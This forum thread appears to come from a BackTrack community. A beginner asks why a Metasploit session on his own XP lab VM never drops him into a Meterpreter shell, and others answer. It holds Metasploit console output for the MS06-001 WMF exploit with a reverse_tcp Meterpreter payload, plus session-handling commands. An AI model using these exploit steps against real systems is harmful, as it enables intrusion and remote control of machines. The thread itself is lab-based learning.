Thread: Metasploit problem

Just burned his ISO

Default Metasploit problem

Alright im running ubuntu 9.04 i have metasploit installed perfectly. not that it was a challenge to do so. haha but im testing on a virtualbox that i set up. windows xp sp2. no security software installed except for the default windows firewall. Im just playing around with metasploit because im sort of new to it. I understand how exploits work and such. just not how metasploit works.
    basically i get the exploit to run perfectly. everything is good. it says it opens a session but im never returned to a Meterpreter shell. I have tried generic shells and regular shells that metasploit offers. Is there anything im doing wrong or is metasploit just not returning the shell to me for some other reason?
    Thanks in advance everyone!

Here is the output

Code:
    Module options:

Name        Current Setting  Required  Description
       ----        ---------------  --------  -----------
       SRVHOST     192.168.1.102    yes       The local host to listen on.
       SRVPORT     8080             yes       The local port to listen on.
       SSL         false            no        Negotiate SSL for incoming connections
       SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
       URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique: seh, thread, process
       LHOST                      yes       The local address
       LPORT     4444             yes       The local port

Exploit target:

Id  Name
       --  ----
       0   Windows XP/2003/Vista Automatic

msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.1.102
    lhost => 192.168.1.102
    msf exploit(ms06_001_wmf_setabortproc) > exploit[*] Exploit running as background job.
    msf exploit(ms06_001_wmf_setabortproc) > [*] Using URL: http:192.168.1.102:8080/[*] Server started.
    [*] Started reverse handler on port 4444
    [*] Sending exploit to 192.168.1.104:1100...
    [*] Sending stage (723456 bytes)
    [*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.104:1101)
    thats the last thing i see. if i press eneter it returns this

Code:
    msf exploit(ms06_001_wmf_setabortproc) > Interrupt: use the 'exit' command to quit

Are you using BackTrack? This is not an Ubuntu support forum...

But anyway, assuming you were running Metasploit on BackTrack..

List open sessions.

Code:
    sessions -l
    Switch to a session, where X represents the session number.

Code:
    sessions -i X
    You may want to check out the Metasploit Unleashed course if you haven't already.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Just burned his ISO

i know this isnt a ubuntu support forum haha but i get the same error on backtrack. i figure if its a nix system were using it really does not matter much what one. right?
    but thanks for the help im gonna look into it

Quote Originally Posted by Puddin View Post
    i know this isnt a ubuntu support forum haha but i get the same error on backtrack. i figure if its a nix system were using it really does not matter much what one. right?
    No not really, we usually close all non BackTrack related posts, but since we get a lot of Metasploit questions here I thought I'd answer you anyway. But next time Id suggest you try using BackTrack instead of Ubuntu.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.